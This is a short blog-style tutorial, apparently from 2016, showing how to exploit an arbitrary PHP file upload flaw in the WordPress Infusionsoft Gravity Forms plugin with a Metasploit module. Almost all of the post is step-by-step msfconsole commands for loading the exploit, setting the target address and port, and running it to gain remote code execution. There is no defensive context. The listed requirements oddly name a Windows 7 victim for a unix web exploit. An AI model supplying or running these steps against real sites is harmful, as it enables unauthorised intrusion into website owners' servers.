Exploit Remote PC using Wordpress InfusionSoft Upload Vulnerability

at 10:09 AM Wednesday, April 27, 2016
This module exploits an arbitrary PHP code upload in the WordPress Infusionsoft Gravity Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file upload and remote code execution.

Exploit Targets
Infusionsoft Gravity Forms plugin 1.5.3

Requirement
Attacker: kali Linux
Victim PC: Windows 7


Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/wp_infusionsoft_upload
msf exploit (wp_infusionsoft_upload)>set targeturi wordpress
msf exploit (wp_infusionsoft_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_infusionsoft_upload)>set rport 80
msf exploit (wp_infusionsoft_upload)>exploit       

Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)